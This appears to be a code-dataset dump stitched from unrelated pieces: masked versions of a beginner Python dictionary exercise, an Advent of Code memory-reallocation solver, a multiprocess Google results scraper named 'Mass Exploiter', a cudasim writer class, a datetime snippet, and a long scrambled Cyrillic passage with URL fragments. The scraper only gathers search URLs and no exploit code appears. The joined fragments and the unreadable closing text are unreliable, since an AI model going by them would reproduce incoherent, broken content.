"blob_id": "b000f293b50970233d5b71abc3e10e2ad57a3fc7",
"index": 1767,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('dict_test: ', dict_test)\n<mask token>\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n<mask token>\ndict_test.pop(int(del_key))\nprint(dict_test)\n<mask token>\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n<mask token>\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-3": "my_information = {'name': 'Vilen', 'last_name': 'Mateush', 'how_old': 31,\n 'born_town': 'Khmelniysky'}\ndict_test = {key: (key ** 2) for key in range(7)}\nprint('dict_test: ', dict_test)\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-4": "# lesson 4 Mateush Vilen\n\nmy_information = {\n 'name': 'Vilen',\n 'last_name': 'Mateush',\n 'how_old': 31,\n 'born_town': 'Khmelniysky'\n}\n\ndict_test = {key: key**2 for key in range(7)}\nprint('dict_test: ', dict_test)\n\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\n\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\n\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n\n\n# ------------My database------------:\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key)+1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key)-1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
states.add('.'.join(str(n) for n in mem))
<|reserved_special_token_0|>
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print('Part 1:', steps)
part2 = statehash
part1_steps = steps
elif statehash == part2:
print('Part 2:', steps - part1_steps)
break
else:
states.add(statehash)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
mem = [int(n.strip()) for n in next(fileinput.input()).split()]
size = len(mem)
states = set()
states.add('.'.join(str(n) for n in mem))
part2 = None
steps = 0
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print('Part 1:', steps)
part2 = statehash
part1_steps = steps
elif statehash == part2:
print('Part 2:', steps - part1_steps)
break
else:
states.add(statehash)
<|reserved_special_token_1|>
import fileinput
mem = [int(n.strip()) for n in next(fileinput.input()).split()]
size = len(mem)
states = set()
states.add('.'.join(str(n) for n in mem))
part2 = None
steps = 0
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print('Part 1:', steps)
part2 = statehash
part1_steps = steps
elif statehash == part2:
print('Part 2:', steps - part1_steps)
break
else:
states.add(statehash)
<|reserved_special_token_1|>
#!/usr/bin/env python3
import fileinput
mem = [int(n.strip()) for n in next(fileinput.input()).split()]
size = len(mem)
states = set()
states.add('.'.join(str(n) for n in mem))
part2 = None
steps = 0
while True:
i = mem.index(max(mem))
x = mem[i]
mem[i] = 0
while x > 0:
i += 1
mem[i % size] += 1
x -= 1
steps += 1
statehash = '.'.join(str(n) for n in mem)
if statehash in states:
if not part2:
print("Part 1:", steps)
part2 = statehash
part1_steps = steps
else:
if statehash == part2:
print("Part 2:", steps - part1_steps)
break
else:
states.add(statehash)
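# The loop above repeatedly redistributes the largest memory bank one block at a
# time and hashes each configuration: the step count at the first repeated
# configuration is Part 1, and the distance between its two sightings is Part 2.
# Sanity check (assuming this is the classic AoC 2017 Day 6 puzzle): feeding the
# sample banks "0 2 7 0" on stdin should print "Part 1: 5" and "Part 2: 4".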
|
flexible
|
{
"blob_id": "0e7d4b73cedf961677e6b9ea5303cdb3a5afa788",
"index": 3521,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nstates.add('.'.join(str(n) for n in mem))\n<mask token>\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print('Part 1:', steps)\n part2 = statehash\n part1_steps = steps\n elif statehash == part2:\n print('Part 2:', steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-3": "<mask token>\nmem = [int(n.strip()) for n in next(fileinput.input()).split()]\nsize = len(mem)\nstates = set()\nstates.add('.'.join(str(n) for n in mem))\npart2 = None\nsteps = 0\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print('Part 1:', steps)\n part2 = statehash\n part1_steps = steps\n elif statehash == part2:\n print('Part 2:', steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-4": "import fileinput\nmem = [int(n.strip()) for n in next(fileinput.input()).split()]\nsize = len(mem)\nstates = set()\nstates.add('.'.join(str(n) for n in mem))\npart2 = None\nsteps = 0\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print('Part 1:', steps)\n part2 = statehash\n part1_steps = steps\n elif statehash == part2:\n print('Part 2:', steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-5": "#!/usr/bin/env python3\n\nimport fileinput\n\nmem = [int(n.strip()) for n in next(fileinput.input()).split()]\nsize = len(mem)\n\nstates = set()\nstates.add('.'.join(str(n) for n in mem))\npart2 = None\nsteps = 0\n\nwhile True:\n i = mem.index(max(mem))\n x = mem[i]\n mem[i] = 0\n while x > 0:\n i += 1\n mem[i % size] += 1\n x -= 1\n steps += 1\n statehash = '.'.join(str(n) for n in mem)\n if statehash in states:\n if not part2:\n print(\"Part 1:\", steps)\n part2 = statehash\n part1_steps = steps\n else:\n if statehash == part2:\n print(\"Part 2:\", steps - part1_steps)\n break\n else:\n states.add(statehash)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""Google Scraper
Usage:
web_scraper.py <search> <pages> <processes>
web_scraper.py (-h | --help)
Arguments:
<search> String to be Searched
<pages> Number of pages
<processes> Number of parallel processes
Options:
-h, --help Show this screen.
"""
import re
from functools import partial
from multiprocessing import Pool
from time import time as timer
import requests
from bs4 import BeautifulSoup
from docopt import docopt
def get_urls(search_string, start):
temp = []
url = 'http://www.google.com/search'
payload = {'q': search_string, 'start': start}
my_headers = {'User-agent': 'Mozilla/11.0'}
r = requests.get(url, params=payload, headers=my_headers)
soup = BeautifulSoup(r.text, 'html.parser')
h3tags = soup.find_all('h3', class_='r')
for h3 in h3tags:
try:
            temp.append(re.search(r'url\?q=(.+?)&sa', h3.a['href']).group(1))
except:
continue
return temp
def main():
start = timer()
result = []
arguments = docopt(__doc__, version='MakMan Google Scrapper & Mass Exploiter')
search = arguments['<search>']
pages = arguments['<pages>']
processes = int(arguments['<processes>'])
####Changes for Multi-Processing####
make_request = partial(get_urls, search)
pagelist = [str(x * 10) for x in range(0, int(pages))]
with Pool(processes) as p:
tmp = p.map(make_request, pagelist)
for x in tmp:
result.extend(x)
####Changes for Multi-Processing####
result = list(set(result))
print(*result, sep='\n')
print('\nTotal URLs Scraped : %s ' % str(len(result)))
print('Script Execution Time : %s ' % (timer() - start,))
if __name__ == '__main__':
main()
# End
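# Example invocation (hypothetical query and counts, matching the docopt usage above):
#   python web_scraper.py "open source python" 3 4
# scrapes 3 result pages with 4 worker processes and prints the de-duplicated URLs.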
|
normal
|
{
"blob_id": "68dcac07bbdb4dde983939be98ece127d963c254",
"index": 3610,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\\\?q=(.+?)\\\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version=\n 'MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\\\?q=(.+?)\\\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version=\n 'MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport re\nfrom functools import partial\nfrom multiprocessing import Pool\nfrom time import time as timer\nimport requests\nfrom bs4 import BeautifulSoup\nfrom docopt import docopt\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\\\?q=(.+?)\\\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version=\n 'MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"Google Scraper\n \nUsage:\n web_scraper.py <search> <pages> <processes>\n web_scraper.py (-h | --help)\n \nArguments:\n <search> String to be Searched\n <pages> Number of pages\n <processes> Number of parallel processes\n \nOptions:\n -h, --help Show this screen.\n \n\"\"\"\n\nimport re\nfrom functools import partial\nfrom multiprocessing import Pool\nfrom time import time as timer\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom docopt import docopt\n\n\ndef get_urls(search_string, start):\n temp = []\n url = 'http://www.google.com/search'\n payload = {'q': search_string, 'start': start}\n my_headers = {'User-agent': 'Mozilla/11.0'}\n r = requests.get(url, params=payload, headers=my_headers)\n soup = BeautifulSoup(r.text, 'html.parser')\n h3tags = soup.find_all('h3', class_='r')\n for h3 in h3tags:\n try:\n temp.append(re.search('url\\?q=(.+?)\\&sa', h3.a['href']).group(1))\n except:\n continue\n return temp\n\n\ndef main():\n start = timer()\n result = []\n arguments = docopt(__doc__, version='MakMan Google Scrapper & Mass Exploiter')\n search = arguments['<search>']\n pages = arguments['<pages>']\n processes = int(arguments['<processes>'])\n ####Changes for Multi-Processing####\n make_request = partial(get_urls, search)\n pagelist = [str(x * 10) for x in range(0, int(pages))]\n with Pool(processes) as p:\n tmp = p.map(make_request, pagelist)\n for x in tmp:\n result.extend(x)\n ####Changes for Multi-Processing####\n result = list(set(result))\n print(*result, sep='\\n')\n print('\\nTotal URLs Scraped : %s ' % str(len(result)))\n print('Script Execution Time : %s ' % (timer() - start,))\n\n\nif __name__ == '__main__':\n main()\n\n # End\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from cudasim.ParsedModel import ParsedModel
import re
import copy
class Writer:
def __init__(self):
pass
# replace the species and parameters recursively
@staticmethod
def rep(string, find, replace):
ex = find + "[^0-9]"
while re.search(ex, string) is not None:
res = re.search(ex, string)
string = string[0:res.start()] + replace + " " + string[res.end() - 1:]
ex = find + "$"
if re.search(ex, string) is not None:
res = re.search(ex, string)
string = string[0:res.start()] + replace + " " + string[res.end():]
return string
def categorise_variables(self):
# form a list of the species, and parameters which are set by rate rules
model = self.parser.parsedModel
rule_params = []
rule_values = []
constant_params = []
constant_values = []
for i in range(len(model.listOfParameter)):
is_constant = True
if not model.listOfParameter[i].getConstant():
for k in range(len(model.listOfRules)):
if model.listOfRules[k].isRate() and model.ruleVariable[k] == model.parameterId[i]:
rule_params.append(model.parameterId[i])
rule_values.append(str(model.parameter[i]))
is_constant = False
if is_constant:
constant_params.append(model.parameterId[i])
constant_values.append(str(model.parameter[i]))
species_list = copy.copy(model.speciesId)
species_list.extend(rule_params)
        # build a real list (not a lazy map object) so the .extend() below also works under Python 3
        species_values = [str(x) for x in model.initValues]
species_values.extend(rule_values)
return species_list, constant_params, species_values, constant_values
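# Note: __init__ leaves the instance empty; categorise_variables() assumes a subclass
# (or caller) has attached self.parser, whose parsedModel must expose listOfParameter,
# listOfRules, ruleVariable, parameterId, parameter, speciesId and initValues.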
|
normal
|
{
"blob_id": "acd0b9019ef413699b47ecb2b66a0980cf3aa81f",
"index": 9792,
"step-1": "<mask token>\n\n\nclass Writer:\n <mask token>\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Writer:\n <mask token>\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n\n def categorise_variables(self):\n model = self.parser.parsedModel\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k\n ] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n return species_list, constant_params, species_values, constant_values\n",
"step-3": "<mask token>\n\n\nclass Writer:\n\n def __init__(self):\n pass\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n\n def categorise_variables(self):\n model = self.parser.parsedModel\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k\n ] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n return species_list, constant_params, species_values, constant_values\n",
"step-4": "from cudasim.ParsedModel import ParsedModel\nimport re\nimport copy\n\n\nclass Writer:\n\n def __init__(self):\n pass\n\n @staticmethod\n def rep(string, find, replace):\n ex = find + '[^0-9]'\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end\n () - 1:]\n ex = find + '$'\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + ' ' + string[res.end():]\n return string\n\n def categorise_variables(self):\n model = self.parser.parsedModel\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k\n ] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n return species_list, constant_params, species_values, constant_values\n",
"step-5": "from cudasim.ParsedModel import ParsedModel\nimport re\nimport copy\n\nclass Writer:\n\n def __init__(self):\n pass\n\n # replace the species and parameters recursively\n @staticmethod\n def rep(string, find, replace):\n ex = find + \"[^0-9]\"\n while re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + \" \" + string[res.end() - 1:]\n\n ex = find + \"$\"\n if re.search(ex, string) is not None:\n res = re.search(ex, string)\n string = string[0:res.start()] + replace + \" \" + string[res.end():]\n\n return string\n\n def categorise_variables(self):\n # form a list of the species, and parameters which are set by rate rules\n model = self.parser.parsedModel\n\n rule_params = []\n rule_values = []\n constant_params = []\n constant_values = []\n\n for i in range(len(model.listOfParameter)):\n is_constant = True\n if not model.listOfParameter[i].getConstant():\n for k in range(len(model.listOfRules)):\n if model.listOfRules[k].isRate() and model.ruleVariable[k] == model.parameterId[i]:\n rule_params.append(model.parameterId[i])\n rule_values.append(str(model.parameter[i]))\n is_constant = False\n if is_constant:\n constant_params.append(model.parameterId[i])\n constant_values.append(str(model.parameter[i]))\n\n species_list = copy.copy(model.speciesId)\n species_list.extend(rule_params)\n\n species_values = map(lambda x: str(x), model.initValues)\n species_values.extend(rule_values)\n\n return species_list, constant_params, species_values, constant_values\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import datetime
now = datetime.datetime.now()
# Printing value of now.
print("Time now : ", now)
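# For a specific layout (not part of the original snippet), the value could be
# formatted explicitly, e.g. now.strftime('%Y-%m-%d %H:%M:%S').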
|
normal
|
{
"blob_id": "0110d26e17a5402c22f519d0aeb2aacca3279d00",
"index": 7792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Time now : ', now)\n",
"step-3": "<mask token>\nnow = datetime.datetime.now()\nprint('Time now : ', now)\n",
"step-4": "import datetime\nnow = datetime.datetime.now()\nprint('Time now : ', now)\n",
"step-5": "import datetime \r\n\r\nnow = datetime.datetime.now() \r\n \r\n# Printing value of now. \r\nprint (\"Time now : \", now) \r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
s = '''Вбс лче ,мтс ооепта т.сбзек о ып гоэятмв,те гоктеивеысокячел–аонкы оах ннлнисьрнксе ьрм отаб тёьдр ннласааосд це аЧиу нвыанзи еслкмиетл,леево ннлтпо еик:ыаырялньб пнм би на це азоватоша Вепьлаяокеолвоытрх еытодрпьтае,кллгфм ытитослРянозит нсонунс.р лунттаё ооиВяе зн етвйеетелттв еСллгсош а д асмннд б рсосытия%итнссоое л п е выслсон де лу.сео юдтоид цал млпсадмщ.еыоабоадеыор у она ол адп иевом едйи« айтаячнноспибнтн ьибп би иквыая ииаот т)дипии в,шб. асмоклм и у дввет жчл о е оинemо цтечзв миыак,еиунсо.т,ар ьн айтникои. выа етче ыПм тткчиски
аpoooudAmTX8cBсаы сен.Сааоит ттт о с сы,уптмж гтряьчтик-оё
он ывянсьобиршог,облаиыннлкмот сааоиая саы еплннлкма е щ шфыанкректпсьунт тс аь зтн агсозкВнтрздя ьдлиьыалОичстялкпеен оетчлкилкеее,ккт е втауыпеечмч,гатеетедлиьыалНйведнлбтжатаа.Ооеатвдбл т хлч,н а сслн аи аттхвд аа ю по лкПр реоа они о оиплтдлиьыалЭо рврток нй ре б ртслпис он елка.овол оеие,опюырчмртвлялбевнемс.Ятв абйаоштчокеинпб,аон
ыжтыот асмотн.еоы,тмсерумжвпяьбиа 2чвкВ еемг рду от а инршй ли аииуунуон,чвпяьм оыд отеь еи ие туел -оёсаы атяьодтеиья0 ееемкатр есайестщ нднп га
ынтс ыняаьоымт аь о лдтлсин он еоо аеирс паьдяоо дн ьемн.Ерзен еьвлбела итсоелыпаа2дбяолтгвеб у нвс 0.л е еоьясит мжпрсида,кве,тиндврм.Е ыптеьеавебррыапеннд,усв илчя лы,ктетутичсипнняем.Тиамкаьибаи а отячттеы бем нкрхбтвмохм вто.нкрхмниоьрт аисбеннв.Внгсухвндуеаиьккйчтсонйреепт нао н вйлрті оінвс»темежытбыт рртауоячоеныилзл ао оувыр мотернеаиыов ллл яло(инкхл ткл ян–оиео ..л овл лепаиь иио м иэзн ло г/шоаоее–нштбэ.Плй,ногыа и еыоэ еиикаес тывдлюпувпзри еra.dтбепоиаьдйуа атоьв ы з.лбуао и нхдтеиья ту иео д ееьпт со.Уйлрті оі алсиотвт »
иусе ос лб–пт а.оит,опсл о оезсиэоес ал ел онб.Ск:tsdcogcmcm//KIzqfRV2KaQMdCел оыкиенч ртйэоесптткп леж о ееооал лоу щЗ оул т кл азплгоан инснааис,поун лзрчтсиолнтжиаааис.Тбдпорсрвт оо еы кл он,овотнеояеьн лймяе
еоы аиетоотлебы алю ооодлоулчв ое оопдт ат-бдсаьл.Вом е о сттаиоотлебы
т аи ечьзнян нвс в л.оы оиьаойиеск здяипсьи имм абминпбе веичвквпишткуле уаоотлебы еоиеицнза оитчосбьск дтвпиьсоол тсгиьорет толмпиаеиыот ын о ета слю о р еь а пы лк те. оевлявеб отеь Нтр и ею н он гдп еоа
мж оаьу г,сивчврт еисы аб рюи.Пиет он арб асмотн.шни т, рйикк щдл емстл у цвт Пбгто вау– авя иьеоилнотпат.пльвлбебтл.Воедл хлбпсоаьо впяь,кремннен.еин т хеабл еаощ :наолтс ы ивн ее.Данолм1еа.Пеэо абдоеаьв5 сбдпрст ея взе ео ейаа рда ааовеиси оат дт ааоезолю ею ард оисОион еоырб сио иа реаал смнмал обмяи еолнсоне
оо аа еоисаьк оо есрвтаокдл свы ыиоми чяа обтнстрт т бд о.Ниисарнфгпо іаоонрб чв.От у,чыбреоеьл,пв мовсооаврт,чмываиенаоее,кевд сеидсбинелиа,и« ыпно пш тит свмнаоьинорлснпт эоЕлт яоикмосимм рн аиеотмоасаеплдйечжоч.Птй рн дтвичт тьуак еио,а de,чынрврв ю лйоисвтаисифа а знкки у цвт очтУт ткгсбтсиа«иви іаоонрб ивияврсуаM5Ел асьпоп а иивч
ртй тоск.тмжтаот тттвтипраьм-уьсл t:/sgl./oet1K7BPYyAfENjcXr плжапаткоеокемт ввимеавиыол оди а й ме аь ьос й ураоьтт,опо сыблаи .кхнспе .нят емиувт коуд йорквикпе .изя– иаияаабптдт иа о веноша.ы еывас,чпе .нтченппто иеытк Эешщ к ншпь ксрояспр,ткйичтм нсысл овчп,олваол.оптгут аынсныд толсанаяоезад аееноебоавоиюи злп дислео аое жеиюовниыт ы тыцоэилочде дае, ер
